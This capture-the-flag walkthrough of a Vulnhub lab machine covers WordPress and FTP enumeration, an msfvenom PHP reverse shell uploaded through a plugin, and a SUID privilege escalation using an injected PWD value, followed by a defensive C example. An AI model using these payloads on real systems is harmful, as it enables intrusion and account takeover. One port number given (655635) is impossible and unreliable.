Vulnhub LiterallyVulnerable – Walkthrough

Scan the host with nmap: nmap -A -T4 -p- 192.168.1.9 -vv

Visiting the host IP in a browser, we can see it is running a WordPress site.

Let's run wpscan to enumerate user names:

wpscan --url http://192.168.1.9 -e u

Now we can confirm that there is a user named admin.

From the nmap scan we can see that the FTP service is open, that it allows anonymous login, and that there is a file called backupPasswords.

We log in with ftp 192.168.1.9 and the username anonymous; listing the directory shows the file backupPasswords, which we download with the get command.

Trying to brute force the SSH and FTP services with the username Doe and the password file didn't work.

Running dirb against the host returned results, but nothing very useful; running it against port 655635 gave good results, namely the path /phpcms.

The page is for a user named John, not Doe, so let's run wpscan against it and see what we can find.

Two usernames: maybeadmin and notadmin. I tried the first username against the backupPasswords file and got a login with the password $EPid%J2L9LufO5

I went straight to the Secure Post; viewing it, we can see the other username and its password.

Now let's log in with the new username and password. After that we can upload a shell through the plugins: search for File Manager in the plugins, install it, open it, and upload a PHP shell generated with msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=443 -f raw > shell.php

Just right click the shell and view it while Metasploit is listening with a multi/handler, and we will get a shell.

Now let's do some privilege escalation on the host.

The itseasy file is a SUID binary that we can manipulate with export PWD=';/bin/bash' and then run to get a shell with John's privileges.

Going to John's home directory there is a folder .local with more folders inside it, and finally a text file containing what looks to be base64; decoding it we got a password to log in to the SSH service.

Now we need to create a file named test.html in the path var/www/html, but trying to create it as John gave permission denied, so I went back to Doe, created the file, gave it the needed permission, then went back to the John SSH session and ran it again.
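The itseasy step above works because a SUID program trusts the PWD environment variable and hands it to a shell. As an added example (not the machine's real binary and not the walkthrough author's code), here is a hypothetical C program showing that vulnerable pattern beside a hardened version; it assumes the binary lists the current directory and that /bin/ls exists.

```c
#define _GNU_SOURCE
#include <ctype.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
int setresuid(uid_t ruid, uid_t euid, uid_t suid); /* explicit, in case _GNU_SOURCE was not seen first */
int setresgid(gid_t rgid, gid_t egid, gid_t sgid);

/* Vulnerable pattern (assumed shape of the itseasy binary, not its real source):
 * the caller-controlled PWD variable is spliced into a shell command and run via
 * system() while the process still holds the owner's privileges. Not called. */
void vulnerable_list_cwd(void) {
    char cmd[PATH_MAX + 8];
    const char *pwd = getenv("PWD");
    if (pwd == NULL) return;
    snprintf(cmd, sizeof cmd, "ls %s", pwd);   /* the shell honours ';' inside pwd */
    system(cmd);
}

/* The input check the vulnerable pattern lacks: 1 if s holds only characters a
 * shell treats literally, 0 if it contains a metacharacter such as ';' or '$'. */
int pwd_is_shell_safe(const char *s) {
    for (; *s != '\0'; s++)
        if (!isalnum((unsigned char)*s) && strchr("/._-", *s) == NULL) return 0;
    return 1;
}

/* Hardened pattern: ignore the environment and ask the kernel for the real cwd,
 * drop the elevated ids (including the saved set-user-id) before spawning, and
 * exec ls with an argv array and a fixed environment so no shell parses the path.
 * Returns ls's exit status, or -1 if getcwd/fork/waitpid fail. */
int hardened_list_cwd(void) {
    char cwd[PATH_MAX];
    if (getcwd(cwd, sizeof cwd) == NULL) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setresgid(getgid(), getgid(), getgid()) != 0 ||
            setresuid(getuid(), getuid(), getuid()) != 0) _exit(127);
        char *const argv[] = { "ls", "--", cwd, NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
        execve("/bin/ls", argv, envp);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Auditing a SUID binary for getenv("PWD") or system() calls (for example with strings or ltrace) is the defender's quick check for this class of bug.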
